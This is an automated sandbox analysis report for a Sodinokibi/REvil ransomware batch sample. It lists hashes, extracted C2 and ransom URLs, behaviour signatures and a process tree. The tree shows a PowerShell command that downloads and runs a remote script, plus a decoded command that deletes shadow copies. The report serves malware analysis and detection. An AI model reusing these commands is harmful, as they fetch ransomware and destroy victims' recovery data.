Analysis

- Max time kernel: 138s
- Max time network: 37s
- Platform: windows7_x64
- Resource: win7v200430
- Submitted: 12-06-2020 00:10
Static task: static1

Behavioral task: behavioral1
- Sample: 315ea3e45ed9d73cb511afb5ad1e2d86.bat
- Resource: win7v200430

Behavioral task: behavioral2
- Sample: 315ea3e45ed9d73cb511afb5ad1e2d86.bat
- Resource: win10v200430
General

- Target: 315ea3e45ed9d73cb511afb5ad1e2d86.bat
- Size: 213B
- MD5: 9ffed33cd2f438b612e85a2525de7fb6
- SHA1: 712f155efba4999bf546e2848347b572bce27b14
- SHA256: 2674c1819c1820eb2c521770cb16fa5b47068ce9fbfa8eacf33d4ce56b08e170
- SHA512: 6378aa3c586fb010b39411f4f1f34d6bbf9266f8a86827f6128c367298d7a295acd59fc72a318df3e5dfae8bb95248b5d8aa5330052bc7064f7b949016b2fafb
Malware Config

Extracted
- URL: http://185.103.242.78/pastes/315ea3e45ed9d73cb511afb5ad1e2d86

Extracted
- Ransom note path: C:\u0s64btn42-readme.txt
- Family: sodinokibi
- URL: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/396850071A9D3213
- URL: http://decryptor.cc/396850071A9D3213
Signatures

- Enumerates connected drives (3 TTPs)
- Modifies service (2 TTPs, 4 IoCs)
  Processes: vssvc.exe
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer (vssvc.exe)
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer (vssvc.exe)
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer (vssvc.exe)
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer (vssvc.exe)
- Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  Processes: powershell.exe
  - Set value (str): \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\3uw6ld.bmp" (powershell.exe)
- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  Processes: powershell.exe
  - PID 868 powershell.exe
- Suspicious use of WriteProcessMemory (5 IoCs)
  Processes: cmd.exe, powershell.exe
  - PID 1520 (cmd.exe) wrote to memory of PID 868 (powershell.exe)
  - PID 868 (powershell.exe) wrote to memory of PID 1808 (powershell.exe)
  - PID 868 (powershell.exe) wrote to memory of PID 1808 (powershell.exe)
  - PID 868 (powershell.exe) wrote to memory of PID 1808 (powershell.exe)
  - PID 868 (powershell.exe) wrote to memory of PID 1808 (powershell.exe)
- Suspicious use of AdjustPrivilegeToken (7 IoCs)
  Processes: powershell.exe, powershell.exe, vssvc.exe
  - Token: SeDebugPrivilege, PID 868 powershell.exe
  - Token: SeDebugPrivilege, PID 868 powershell.exe
  - Token: SeDebugPrivilege, PID 1808 powershell.exe
  - Token: SeBackupPrivilege, PID 784 vssvc.exe
  - Token: SeRestorePrivilege, PID 784 vssvc.exe
  - Token: SeAuditPrivilege, PID 784 vssvc.exe
  - Token: SeTakeOwnershipPrivilege, PID 868 powershell.exe
- Suspicious behavior: EnumeratesProcesses (77 IoCs)
  Processes: powershell.exe, powershell.exe
  - PID 868 powershell.exe
  - PID 1808 powershell.exe
  (the report lists 77 pid/process rows, every one of them PID 868 or PID 1808 powershell.exe)
- Blacklisted process makes network request (1 IoC)
  Processes: powershell.exe
  - flow 3, PID 868 powershell.exe
- Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
- Drops file in Program Files directory (26 IoCs)
  Processes: powershell.exe
  - File opened for modification: \??\c:\program files\ClearUnlock.snd (powershell.exe)
  - File opened for modification: \??\c:\program files\RedoRestart.asf (powershell.exe)
  - File opened for modification: \??\c:\program files\SkipExpand.ttc (powershell.exe)
  - File opened for modification: \??\c:\program files\WatchSync.vb (powershell.exe)
  - File created: \??\c:\program files\microsoft sql server compact edition\v3.5\u0s64btn42-readme.txt (powershell.exe)
  - File created: \??\c:\program files\u0s64btn42-readme.txt (powershell.exe)
  - File opened for modification: \??\c:\program files\DebugConnect.shtml (powershell.exe)
  - File opened for modification: \??\c:\program files\UnblockExpand.dot (powershell.exe)
  - File opened for modification: \??\c:\program files\UseWait.mpeg (powershell.exe)
  - File opened for modification: \??\c:\program files\WatchLimit.jpeg (powershell.exe)
  - File created: \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\u0s64btn42-readme.txt (powershell.exe)
  - File opened for modification: \??\c:\program files\CloseCompare.001 (powershell.exe)
  - File opened for modification: \??\c:\program files\MergePop.gif (powershell.exe)
  - File created: \??\c:\program files\microsoft sql server compact edition\u0s64btn42-readme.txt (powershell.exe)
  - File opened for modification: \??\c:\program files\NewMount.3gpp (powershell.exe)
  - File opened for modification: \??\c:\program files\PushPop.MTS (powershell.exe)
  - File opened for modification: \??\c:\program files\SyncExit.TS (powershell.exe)
  - File opened for modification: \??\c:\program files\RegisterGet.mp4 (powershell.exe)
  - File created: \??\c:\program files (x86)\u0s64btn42-readme.txt (powershell.exe)
  - File opened for modification: \??\c:\program files\CheckpointNew.pcx (powershell.exe)
  - File opened for modification: \??\c:\program files\ConvertFromCompare.aiff (powershell.exe)
  - File opened for modification: \??\c:\program files\DenyAssert.3gp2 (powershell.exe)
  - File opened for modification: \??\c:\program files\InitializeSubmit.vstm (powershell.exe)
  - File opened for modification: \??\c:\program files\MountCopy.docx (powershell.exe)
  - File opened for modification: \??\c:\program files\ProtectRevoke.xla (powershell.exe)
  - File opened for modification: \??\c:\program files\RenameSplit.gif (powershell.exe)
Processes

- C:\Windows\system32\cmd.exe (PID 1520)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\315ea3e45ed9d73cb511afb5ad1e2d86.bat"
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 868)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/315ea3e45ed9d73cb511afb5ad1e2d86');Invoke-NLIWNW;Start-Sleep -s 10000"
    - Sets desktop wallpaper using registry
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of WriteProcessMemory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
    - Drops file in Program Files directory
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1808)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is base64-encoded UTF-16LE and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} ; this shadow copy deletion is what triggers the vssvc.exe activity and SeBackupPrivilege/SeRestorePrivilege use recorded above)
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses
- C:\Windows\system32\vssvc.exe (PID 784)
  Command line: C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken